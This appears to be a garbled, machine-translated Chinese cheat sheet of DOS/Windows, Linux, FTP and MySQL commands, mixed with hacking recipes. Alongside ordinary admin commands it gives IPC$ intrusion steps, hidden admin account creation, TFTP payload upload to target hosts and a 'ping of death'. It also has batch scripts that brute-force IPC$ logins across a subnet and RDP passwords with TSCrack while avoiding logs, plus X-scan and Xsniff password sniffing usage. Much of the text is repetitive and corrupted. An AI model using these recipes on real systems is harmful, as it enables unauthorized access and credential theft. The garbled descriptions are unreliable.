Generally speaking, DOS commands are carried out in THE DOS program, if the COMPUTER installed DOS program can be selected from the boot option, in the Windows system, we can also enter CMD command from the start to enter the DOS command in the operating system, as shown below:
Strictly speaking, the Windows command window is not the real DOS operating interface, its function is not comprehensive, the real DOS program is in the computer did not enter the system and enter the DOS interface, as shown below:
As shown in the figure above, we only need to enter various DOS commands in the DOS interface to realize the corresponding commands.
Net use ipiPC $” “/user:” “net use ipiPC $” /user:” “net use ipiPC $” /user:” “net use ipiPC $” /user:” ” Ipc $” password “/user:” user name” C: to local: H: net use H: IPC $” to local: H: net use ipiPC $/del delete IPC link. Net use H: Net user User name password /add Create a user. Net user guest /active:yes Activate the guest user. Net user View the available users Net locaLGroup Administrators Username /add Add the user to the administrator account to give it administrator rights. Net start Check which services are enabled. Net start Service name Enable the service. Net start Telnet Net start schedule) net stop Service name Stop a service. Net time Target IP address View the time of the peer. Net time Target IP address /set To synchronize the time of the local computer with that of the host in Target IP address, add /yes to cancel confirmation Net View View which shares are enabled on the local LAN. Net View IP View which shares are enabled on the peer LAN. Net Config Display system network Settings. Net Logoff Disconnected share Net VER Network connection type and information in use on the LAN. Net Share View the share enabled locally. Net Share IPC $Enable IPC $share Net share c$/del delete C: Share net user guest 12345 Log in as the guest user and change the password to 12345 net password Change the system login password netstat -a View ports that are enabled. Netstat -an netstat -n is commonly used To view the network connection of a port, run the following command: netstat -an netstat -v To view the ongoing work netstat -p Protocol name An example is as follows: Netstat -p TCQ/IP Viewing the usage of A protocol (viewing the usage of TCP/IP) netstat -s Viewing the usage of all protocols in use nBTstat -a IP If one of the ports of the peer party 136 to 139 is enabled, TrAcert – Parameter IP (or computer name) to trace the route (packet). Parameter “-w number” is used to set the timeout interval. Ping IP address (or domain name) Sends 32 bytes of data to the peer host. The parameter is -l[space] Packet size. -n Number of data sending times. -t indicates ping all the time. Ping -t -l 65550 IP Ping of death ipconfig (winipcfg) for Windows NT and Windows XP(Windows 95 98) Ipconfig Available parameter /all displays all configuration information tlist -t Displays processes in a tree row and column list. In the Support/tools directory, run the kill -f command to forcibly end a process by adding the -f parameter to the process name. (It is an additional tool of the system and is not installed by default. In the Support/tools folder of the installation directory) del -f Add the -f parameter to the file name to delete the read-only files. /AR,/ AH,/ AS, and /AA indicate that the read-only, hidden, system, and archive files are to be deleted respectively. / a-r, / a-h, / a-s, / a-a delete files except read-only, hidden, system, and archived files. For example, DEL/AR *.* indicates that all read-only files in the current directory are deleted. DEL/ a-s *.* indicates that all files except system files in the current directory are deleted
Delete the del /S /Q directory or use rmdir /S /Q directory /S to delete the directory and all subdirectories and files under the directory. Use parameter /Q at the same time to cancel the system confirmation of the deletion operation and delete it directly. (The two commands have the same function.) move Drive letter Path Name of the file to be moved Path of the file to be moved After the file name is moved, use /y to cancel the prompt for confirming the existence of the same file in the move directory and overwrite fc one. TXT two- Compare the two files and print the differences to 3st.txt. “> “and “> >” are redirection commands at ID number Start a registered scheduled task. At /delete Stop all scheduled tasks. At ID number /delete Stop a registered scheduled task at View all scheduled tasks at IP time Program name (or a command) /r Run the program of the other party at a certain time and restart the computer Finger username The default port is 23. Open IP Connect to IP (Telnet login command) Telnet Enter Telnet on the local computer to enter the Telnet copy of the local computer Path file name 1 Path file name 2 /y Copy file 1 to the specified directory as file 2 Exe ipadmin$Copy local c:srv.exe to admin cppy 1st. JPG /b+2st.txt/a 3st.jpg TXT file: $svv.exe c: $svV. TXT c: $svV. TXT c: $svV. TXT c: $svV. TXT Copyipadmin $*.* copy srv.exe file (all files) from admini$to local C: Xcopy File or directory tree to be copied Destination address Directory name To copy files and directory trees. The /Y parameter does not prompt you to overwrite the same files TFTP -i own IP address get server.exe c:server.exe Download IP server.exe to target host c:server. -i Indicates the transmission in binary mode, for example, the transmission of an EXE file. If no -i is added, the transmission is in ASCII mode. TFTP -i Peer IPput c:server.exe After login, Upload local C :server.exe to host FTP IP port Used for uploading files to the server or performing file operations. The default port is 21. Bin means to send in binary (executable file forward); Default ASCII format for transmission (text file) Route print Displays the IP route. Network addres, subnet mask, Netmask, Gateway addres, Interface ARP View and process the ARP cache. Arp is name resolution, which resolves an IP address into a physical MAC address. Arp -a Displays all information start Program name or command/Max or /min Open a new window and maximize (minimize) run a program or command mem View CPU usage attrib file name (directory name) View attributes of a file (directory) attrib file name -a -r-s -h or +A +R +S +H Remove (add) the archive of A file, read only, system, hide attributes; + is added to view a file for an attribute dir. /T:C displays the time when the file was created. /T:A displays the time when the file was last accessed. /T:W Time when the file was last modified date /T and time /T If this parameter is used, only the current date and time are displayed. Instead of entering a new date and time set Specifies the name of the environment variable = the character to be assigned to the variable Set the environment variable set Displays all current environment variables set P (or other characters) Displays all current environment variables starting with character P (or other characters) pause Pauses the batch program and displays: Press any key to continue…. If performs conditional processing in a batch program (see if commands and Variables for more information). The goto tag directs cmd.exe to a labeled line in the batch program (the tag must be a single line and begin with a colon, for example: “: Call path Batch file name to invoke another batch program from a batch program (see Call /? For more instructions). For executes a specific command for each file in a set of files (see for commands and variables for more information) echo on or off Turn echo on or off, Echo information is displayed on the screen echo information >> pass. TXT Save “information” to the pass. TXT file findstr “Hello” aa.txt Hello find File name Find a file Title Title Name Change CMD window title name color Color value Set CMD console foreground and background colors; 0 = black, 1 = blue, 2 = green, 3 = light green, 4 = red, 5 = purple, 6 = yellow, 7= white, 8= gray, 9= light blue, A = light green, B= light green, C= light red, D= light purple, E= light yellow, F= light white prompt name change CMD: EntSky )
Winver Displays the version information (memory size, system version, patch version, and computer name) in the DOS window. Format Drive letter /FS: Type Formats disks. The types are FAT, FAT32, and NTFS, for example, format D: /FS:NTFS md Directory name Create directory replace Source file Directory to replace file ren Original file name New file name Rename file name tree Displays the directory in a tree structure, Use the -f parameter to list the file names in the first folder type file name Display the contents of the text file more file name display the output file screen by screen Command doskey command to lock = character doskey command to unlock = Lock commands provided for DOS (edit the command line, re-call the win2K command, And create macros). For example, run the lock dir command: doskey dir=entsky (do not use doskey dir=dir). Unlock: doskey dir= taskMgr Call up the task manager CHKDSK /F D: check disk D and display the status report; Tlntadmn telnt service admn, type tlntadmn select 3, then 8, to change the Telnet service default port 23 to any other port exit cmd.exe program or for now, Exit the current batch script with /B instead of cmd.exe path File name of the executable file Sets a path for the executable file. CMD launches a win2K command interpretation window. Parameters: /eff, /en Close, enable command extension; For more details, see CMD /? Regedit /s registry file name import registry; Parameter /S indicates quiet mode import without any prompt. Regedit /e Registry file name Exports the registry
Cacls file name parameter displays or modifies file access control lists (ACLs) for NTFS format. Parameter: /D User name: deny access to a user. /P User name :perm Replaces the access permission of a specified user. /G User name :perm Grants access permission to a specified user. Perm can be: N none, R read, W write, C change (write), F full control; For example: cacls D: est. TXT /D pub set D: est. TXT to deny pub access. Cacls file name View user permission list REM text Content Add comments to batch files netsh View or change the local network configuration
IIS service commands: Iisreset /reboot Restarts the Win2K computer. Iisreset /start or Stop Starts or stops all Internet services. Iisreset /restart Stop and restart all Internet services iISReset/Status Displays the status of all Internet services iisreset /enable or disable Enables or disables the restart of Internet services iisreset on the local system / rebootonError When the Internet service is started, stopped, or restarted, the system restarts if an error occurs. Iisreset /noforce If the Internet service cannot be stopped, Iisreset/Timeout Val The Internet service is not stopped when the time exceeds (seconds). If/rebootonError is specified, the computer will be restarted. The default value is 20 seconds for restarting, 60 seconds for stopping, and 0 seconds for restarting. FTP command: (detailed description later) FTP command line format: FTP -v -d -i -n -g[host name] -v Displays all response information of the remote server. -d Indicates the debugging mode. -n Disables automatic FTP login, that is, the. Netrc file is not used. -g Cancels the global file name. Help [command] or? [Command] View Command Description bye or quit Terminates the FTP process on the host and exits the FTP management mode PWD Lists the directories on the remote host. Put or send Local file name [File name uploaded to the host] Send a local file to the remote host [Remote host file name] [File name after downloading to the local host] Transfer from the remote host to the local host mGET [remote-files] Receive a batch of files from the remote host to the local host mput local-files Transfer a batch of files from the local host to the remote host dir or ls [remote-directory] [local-file] Lists the files in the current remote host directory. If there is a local file, write the result to a local file ASCII setting File transfer in ASCII mode (default) bin or image Setting File transfer in binary mode Bell Every time a file transfer is completed, an alarm is generated. Cdup returns the upper directory close Delete Delete files from the remote host. Mdelete [remote-files] Delete a batch of files mkdir Directory-name Rename a directory on a remote host [from] [to] Changes the file name on a remote host rmdir directory-name Deletes a directory on a remote host Status Displays the current FTP status system Display the system type of the remote host User user-name [password] [account] Re-log in to the remote host using another user name Open Host [port] Re-establish a new connection prompt interactive prompt mode macdef defines the macro command
LCD Changes the working directory of the current local host. By default, the system switches to the HOME directory of the current user. Chmod Changes the file permission of the remote host Cdup goes to the parent directory of the remote host directory! Run the interactive shell on the local machine, exit to return to the FTP environment, for example! Ls *.zip
**MYSQL -h host address -u user name -p password; User root does not have a password if you have just installed MYSQL. (example: Mysql -h110.110.110 -uroot -p123456 mysql -h110.110.110 -uroot -p123456 Grant select on MYSQL.* to ‘@’ identified by “‘ ‘; Add new users. MYSQL database; MYSQL database; MYSQL database; Displays the database list. We started with just two databases: mysql and Test. The mysql library is very important because it contains information about the mysql system, so we change passwords and add users, and that’s actually how we do it. The use of mysql; show tables; Describe table name; Create database database name; Use library name; Create table table name (field Settings list); Drop database name; Drop table table name; Delete from table_name delete from table_name; Select * from table_name; select * from table_name; Mysql > alter table mysqldump –opt school>school. BBB School. BBB is a text file. Open it and see if you can find something new. Win2003 added command (utility part) : shutdown/parameter to shutdown or restart the local or remote host. Parameter description: /S Shuts down the host, /R restarts the host, /T Sets the delay time, ranging from 0 to 180 seconds, /A cancels the startup, /M //IP specifies the remote host. Example: shutdown /r /t 0 Restart the local host immediately (no delay) taskill/Process name or PID terminates one or more tasks and processes. Parameter description: /PID To terminate the PID of a process, you can use the tasklist command to obtain the PID of each process, /IM the process name of the process to terminate, /F to forcibly terminate the process, /T to terminate the specified process and its child process. Tasklist displays the processes, services, and process identifiers (pids) of each service process currently running on local and remote hosts. Parameter description: /M lists the DLL files loaded by the current process, and /SVC displays the services corresponding to each process. If no parameter is specified, only the current process is listed.
Linux basic commands: Case-sensitive uname Display version information (same as win2K ver) dir Display current directory files,ls -al display hidden files (same as win2K dir) PWD Query current directory location CD CD.. Back to the previous directory, note the CD and.. There are Spaces between them. CD/Return to the root directory. Cat file name View the content of the file cat >abc. TXT Add the content to the abc. TXT file. More File name Displays a text file page by page. Cp Copy a file mv Move a file rm file name Delete a file, rm -a directory name Delete a directory and its subdirectories mkdir Directory name create a directory rmdir Delete a subdirectory, there is no document in the directory. Diff file compare find file search date Current date and time who Query the user who is using the same machine as you and Login time and place w Query the user who is using the same machine Whoami Check your account name groups Check someone’s Group passwd Change password history check your command ps show process status kill Stop a process GCC hackers usually use it to compile files written in C language su permission convert to the specified user Telnet IP Telnet to the other host (same as win2K). If bash$appears, the connection is successful. FTP FTP connection to a server (same as win2K)
CMD command in Windows
Run the complete winver——— command to check the Windows version wmimgmt. MSC —- to open the Windows management architecture wupdmgr——– Windows update program Winver ——— Check Windows version wmimGMt. MSC —- Open Windows Management architecture wupdmgr——– Windows update program WWWW ——– Windows script host Settings Write — — — — — — — — — — tablet winmsd — — — — — system information wiaacmgr — — — — — — — the scanners and cameras wizard winchat — — — — — — — — XP with LAN chat mem. Exe — — — — — — — — show memory usage Msconfig.exe– System configuration utility mplayer2——- Simple Widnows Media Player mspaint——– Drawing board MSTSC ———- Remote desktop connection Mplayer2 — — — — — — — magnify media player — — — — — — — — a magnifying glass utility MMC — — — — — — — — — — — — open the console mobsync — — — — — — — — synchronous command dxdiag — — — — — — — — — check directx information Drwtsn32 —— System doctor devmgmt. MSC — Device manager dfrg. MSC ——- Disk defragmenter diskmgmt. MSC — Disk management utility dcomcnfg——- Enables the system component service Ddeshare ——- Enable DDE sharing Settings dvdPlay ——–DVD player net Stop Messenger —– Stop messenger—– Start messenger—- Start the messenger service Notepad — — — — — — — — open notepad nslookup — — — — — — — network management tool wizard ntbackup — — — — — — — system backup and restore narrator — — — — — — — screen “talker” NTMSMGR. MSC – mobile storage manager Ntmsoprq. MSC — Mobile storage administrator Operation Request netstat -an—-(TC) command check interface syncapp——– Create a briefcase sysedit——– System configuration editor Sigverif — — — — — — — file signature verification program sndrec32 — — — — — — — the recorder shrpubw — — — — — — — — to create a Shared folder secpol. MSC – local security policy syskey — — — — — — — — — system encryption, once the encryption cannot untie, MSC — Local service Settings Sndvol32——- Volume control program sfc.exe——– System file checker SFC /scannow– Windows file protection Tsshutdn ——- 60-second countdown shutdown command Tourstart —— XP Introduction (Roaming XP program that appears after installation) TaskMgr ——– Task manager EventVwr ——- Event viewer Eudcedit — — — — — — — word explorer program — — — — — — — to open the resource manager packager — — — — — — — object wrapper perfmon. MSC – computer performance monitoring program progman — — — — — — — — the program manager Exe —- registry rsop. MSC ——- Group policy result set regedt32——- Registry editor Rononce -p —-15 seconds Shutdown regsvr32 /u *. DLL port Stops the DLL file Regsvr32 /u zipfldr. DLL —— Cancel ZIP support cmd.exe——–CMD command prompt CHKDSK. Exe —– CHKDSK Disk check certmgr. MSC —- Certificate management utility Calc — — — — — — — — — — – start the calculator charmap — — — — — — — — start character map cliconfg — — — — — — — the SQL SERVER client network utility Clipbrd — — — — — — — — the clipboard viewer Conf — — — — — — — — — — – start netmeeting compmgmt. MSC computer management cleanmgr — — — — — — – * * finishing ciadv. MSC osk — — — — — – indexing service program — — — — — — — — — — — — open the on-screen keyboard Odbcad32 ——-ODBC Data source manager oobe/ MSoobe /a—- Check whether XP is enabled lusrmgr. MSC —- Local user and group logoff——— Log out command iExpress —- Trojan binding tool, The system provides Nslookup——-IP address detector fsmGMt. MSC —– Shared folder manager utilman——– Assistant tool manager gpedit. MSC —– Group policy
Batch commands and variables
For/parameter %variable IN (set) DO command [command_parameters] %variable: specifies a single-letter replaceable parameter, such as % I. %I % is used when calling variables, which are case sensitive (%I is not equal to %I). A batch process can process 10 variables from %0 to %9 at a time, where %0 is used by default for the batch file name, %1 is the first value entered when using this batch by default, the same: %2 – %9 refers to the input 2-9 value; Net use ipipc$pass /user: the IP address is %1,pass is %2, and user is %3
(set): specifies a file or a group of files. Wildcards can be used, such as: (D:user.txt) and (1 1 254)(1-1 254). {” (1 1 254) “the first “1” refers to the starting value, the second “1” refers to the increment, the third “254” refers to the end value, that is, from 1 to 254; “(1-1 254)” : that is, from 254 to 1}
Command: Specifies the command to be executed on the first file, for example, net use. For executing multiple commands, command_parameters is separated by: & : specifies parameters or command-line switches for a particular command
IN (set) : indicates the value IN (set). DO command: Executes the command
Parameter: /L when {(set) is incremental}; /F indicates that the value is continuously obtained from the file until the value is exhausted. {(set) is a file, such as (d:pass.txt)}. Usage example: @echo off Echo usage format: test.bat *.*.* > test.txt
For/L % % G (1, 1, 254) in the do echo % 1. % % G > > test. TXT & net use % 1. % % G/user: administrator | the find command completed successfully “> > test. TXT Set up IPC$connection for 254 IP addresses in the specified class C network segment. If yes, save the IP address in test. TXT.
/L means in increments (i.e., from 1-254 or 254-1); *.*.* is the batch default %1; %%G is the variable (last bit of IP); & is used to separate the echo and net use commands. | refers to the established after the ipc $, the results with the find to see whether there is “the command completed successfully” message; %1.%%G is the complete IP address; (1 1 254) refers to the starting value, the increase value, the end value. Bat IP FOR /F %% I IN (D:user.dic) DO smb.exe %1 %% I D:pass.dic 200 下 文 : ok.exe Dic is used to extract the user password in d:user.dic from the dictionary file d:pass.dic until the file runs out of values. %% I is the user name; %1 is the entered IP address (default). 7:2: if command and variable Basic format: if [not] errorLevel Numeric command statement If the program finally returns an exit code equal to or greater than the specified number, specify the condition as “true”. For example, IF errorlevel 0 is returned after the program is executed, the following command is used. The IF not errorlevel 1 command is used to run the following command IF the returned value is not 1. 0 indicates discovery and successful execution (true); 1 means no discovery, no execution (false). IF [not] String 1== String 2 Command statement IF the specified text strings match (that is, string 1 equals string 2), the following command is executed. Example: “if “%2%”==”4″ goto start” means: if the input second variable is 4, run the following command (note: the variable name is % and “” is added) if [not] exist file name command statement If the specified file name exists, run the following command. For example, “if not nc.exe goto end” means to skip to the “:end” tag if no nc.exe file is found. IF [not] errorLevel Numeric command statement Else command statement or IF [not] string 1== string 2 Else command statement or IF [not] exist File name command statement else command statement add: An else command statement follows: when the preceding condition is not established, it follows the else command. Note: Else must be on the same line as if to be valid. When a del command is used, the entire content of the del command must be enclosed in < >, because the del command can be executed only on a single line. For example, if exist test.txt. else echo test.txt.missing, note the mark in the command.
Terminal service password cracking TSCrack: -h Display Use help -v Display version information -s Type the decryption capability on the screen -b Sound when the password is incorrect -t Send multiple connections (multi-threaded) -n Prevent System Log entries on Targeted server -u Uninstall Remove the TSCrack component. -f Use the password after -f. -f Interval (frequency) -l Use the user name after -L. -w Use the password dictionary after -w Dic administrator -w pass.dic tscrack 192.168.0.1 -l administrator -p 123456 Goto noscan @for /f “tokens=1 delims= “%% I in (3389. TXT) do call hack.bat %% I nscan @echo 3389. TXT no find or scan faild (① save 3389. (suppose you have a host IP list file 3389. TXT that has been scanned with SuperScan or some other anchor sweeper.) Take an IP from the 3389. TXT file, Bat @if not exist tscrack. Exe goto noscan @tscrack %1 -l administrator -w pass.dic >>rouji. TXT :noscan @echo Tscrack. Exe no find or scan faild (② save as hack. Bat) (3389. Rouji.txt = rouji.txt = rouji.txt = rouji.txt = rouji.txt = rouji.txt = rouji.txt = rouji.txt = rouji.txt
Scanning tools: Xscan Basic format xscan-host < start IP address >[-< End IP address >] < Detection item >[Other options] Scan information about all hosts in the “start IP address to End IP address” segment xscan-file < host list file name > < Detection Item >[Other Options] Check item – Active Checks whether the host is alive – OS checks the type of the remote operating system (using NETBIOS and SNMP) -port Checks the port status of common services – FTP Checks the weak FTP password -pub N/A Pop3 N/A POP3-server weak password N/A SMTP N/A SMTP-server vulnerability N/A SQL N/A SQL-server weak password N/A SMB N/A Nt-server weak password N/A IIS N/A IIS encoding/decoding vulnerability n/A POP3 n/A POP3-server weak password N/A SMTP n/A SMtP-server weak password N/A IIS n/A -cgi Detect CGI vulnerability -nasl load Nessus attack script -all Detect all the above items other options -I adapter number Set network adapter, -l Displays all network adapters -v displays detailed scan progress -p Skips hosts that do not respond -o skips hosts that do not detect open ports -t Number of concurrent threads. Number of concurrent hosts Specifies the maximum number of concurrent threads and the number of concurrent hosts. The default value is 100. 10 -log File Name Specifies the file name of the scan report (suffix: Xscan-host 192.168.1.1-192.168.255.255-all-active -p Detects all vulnerabilities of the hosts on the network segment 192.168.1.1-192.168.255.255. Skip the unresponsive host xscan-host 192.168.1.1-192.168.255.255-port-smb -t 150-o Detects the standard port status of the host on the network segment 192.168.1.1-192.168.255.255. Xscan-file hostlist. TXT -port-cgi -t 200,5 -v -o check the standard port status of all hosts listed in the “hostlist. TXT” file, cgi vulnerability, The maximum number of concurrent threads is 200, and a maximum of five hosts are detected at a time. The detailed detection progress is displayed. The host that does not detect open ports is skipped
The FTP command is one of the most frequently used commands by Internet users. To be familiar with and flexibly use the internal COMMANDS of FTP, users can get twice the result with half the effort. If you want to learn how to use background FTP downloads, then you must learn the FTP command.
The FTP command line format is FTP -v -d -i -n -g [host name], where
-v Displays all response information of the remote server
-n Indicates that automatic FTP login is disabled. N ETRc file;
-d Debugging mode is used.
-g Cancels the global file name.
The internal commands used by FTP are as follows (brackets indicate optional commands):
1.! [CMD [args]] : Run the interactive shell on the local machine, exit to return to the FTP environment, for example! Ls *.zip 2.$macro-ame[args] : Execute macro definition macro-name.
3. Account [password] : provides the supplementary password for accessing system resources after logging in to the remote system. Append local-file[remote-file] : appends the local file to the remote system host. If the remote system file name is not specified, the local file name is used.
5. ASCII: Use the ASCII transmission mode. 6. Bell: The computer rings once after each command is executed.
Bin: uses the binary file transfer mode. 8. Bye: Exits the FTP session.
9. Case: Change the uppercase to lowercase letters in the remote host file name when using mGET. 10. CD remote-dir: Go to the remote host directory.
11. Cdup: Access the parent directory of the remote host directory. 12. Chmod mode file-name: Set the access mode of the remote host file file-name to mode, for example, chmod 777 a.out.
13. Close: Breaks the FTP session with the remote server (corresponding to open). 14. Cr: When transferring files in ASSCII mode, the carriage return line feed is converted to a return line.
15. Delete remote-file: Deletes a remote host file. 16. Debug [debug-value] : displays the debugging mode for each command sent to the remote host, for example, deb up 3. If the value is set to 0, the debugging is disabled.
17. Dir [remote-dir][local-file] : displays the remote host directory and saves the result to a local file. 18. DisconNECtion: same as close.
19. Form format: Set the file transfer mode to format. The default mode is file. 20. Get remote-file[local-file] : Transfers the remote-file of the remote host to the local-file of the local disk.
Glob: Sets the filename extension of mdelete, mget, and mput. By default, the filename extension is not used, the same as the -g parameter on the command line. 22. Hash: Displays a hash symbol (#) for every 1024 bytes transferred.
23. Help [CMD] : Displays the help information about the FTP internal command CMD, for example, help get. 24. Idle [seconds] : Sets the sleep timer of the remote server to [seconds].
25. Image: Set the binary transfer mode (same as binary). 26. LCD [dir] : Switch the local working directory to dir.
27. Ls [remote-dir][local-file] : displays the remote directory remote-dir and saves it to the local file local-file. 28. Macdef macroname: Defines a macro. The macro definition ends when a blank line under macdef is encountered.
29. Mdelete [remote-file] : deletes a remote host file. 30. Mdir remote-files local-file: Similar to dir, but multiple remote files can be specified, for example, mdir *.o.*. Zipoutfile.
31. Mget remote-files: transfers multiple remote files. 32. Mkdir dir-name: creates a directory on the remote host.
33. MLS remote-file local-file: same as nlist, but multiple file names can be specified. 34. Mode [modename] : Sets the file transfer mode to Modename. The default mode is Stream.
35. Modtime file-name: displays the last modification time of a remote host file. 36. Mput local-file: transfers multiple files to a remote host.
37. Newer file-name: On the remote MACHINE, if the file name is newer than that of the file with the same name on the local hard disk, the new file is retransmitted. 38. Nlist [remote-dir][local-file] : displays the file list in the remote host directory and saves the local-file in the local disk.
39. Nmap [inpattern outpattern] : Sets the file name mapping mechanism so that certain characters in a file can be converted to each other during file transfer, for example: Nmap $1.$2.$3[$1, $2].[$2, $3] This command is especially applicable when the remote host is a non-UNIX machine. 40. Ntrans [inchars[outchars]] : Set the translation mechanism of file name characters, for example, ntrans1R, the file name LLL will be changed to RRR.
41. Open host[port] : establishes a connection to the specified FTP server. Passive: Enter passive transmission mode.
43. Prompt: Set interactive prompts for multiple file transfers. Proxy ftp-cmd: In the secondary control connection, run an FTP command that allows you to connect two FTP servers to transfer files between them. The first FTP command must be open to establish a connection between the two servers. 45. Put local-file[remote-file] : transfers the local file local-file to the remote host. 46. PWD: Displays the current working directory of the remote host.
47. Quit: Exit the FTP session with bye. 48. Quote arg1, arg2… : Sends parameters to the remote FTP server verbatim, for example, quote syst.
49. Recv remote-file[local-file] : same as get. 50. Reget remote-file[local-file] : similar to GET, but if local-file exists, the data is transmitted from the last transmission break.
51. Rhelp [cmd-name] : Requests help from the remote host. 52. Rstatus [file-name] : if the file name is not specified, the status of the remote host is displayed; otherwise, the status of the file is displayed.
Rename [from][to] : Changes the file name of a remote host. 54. Reset: Clears the answer queue.
55. Restart Marker: Restart GET or PUT at the specified marker, for example, restart 130. 56. Rmdir dir-name: Deletes a remote host directory.
57. Runique: set the file name to be stored only. If the file name exists, add the suffix. 58. Send local-file[remote-file] : same as put.
Sendport: Sets the use of the PORT command. 60. Site arg1, arg2… : sends parameters verbatim to the remote FTP host as the SITE command.
61. Size file-name: displays the file size of the remote host, for example, site idle 7200. 62. Status: Displays the current FTP status.
63. Struct [struct-name] : set file transfer structure to struct-name, default stream structure is used. 64. Sunique: Sets remote host file name storage to only one (corresponding to rUNIQUE).
65. System: Displays the operating system type of the remote host. 66. Tenex: Set the file transfer type to the type required by the TENex machine.
67. Tick: Sets the byte counter during transmission. 68. Trace: Sets packet tracing.
69. Type [type-name] : sets the file transfer type to type-name. The default value is ASCII, for example, type binary. 70. Umask [newmask] : Set the default umask of the remote server to newmask, for example, umask 3
71. User user-name[password][account] : indicates its identity to the remote host. If a password is required, enter the password, for example, user anonymous my@email. Verbose: The same as the -v parameter of the command line, that is, if detailed report is set, all calls of the FTP server are displayed to the user. The default value is on.
73. (CMD) : with the help.
Command line sniffing device Xsniff can sniff OUT FTP/SMTP/POP3/HTTP passwords in the LAN. – TCP Output TCP packets -udp Output UDP packets -icmp Output ICMP packets -pass Filter password information -hide Running in the background -host Parsing host name -addr IP address for filtering IP address -port Port for filtering port -log file name Save the output to a file -ASc output in ASCII format -hex output in hexadecimal format Xsniff -log Pass. log Runs the background sniff password and saves the password information in the pass.log file xsniff Sniff 192.168.1.1 and filter TCP and UDP messages and output them in ASCII format